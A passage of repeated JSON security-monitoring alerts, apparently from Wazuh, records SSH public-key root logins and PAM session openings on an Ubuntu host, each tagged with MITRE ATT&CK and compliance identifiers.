SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 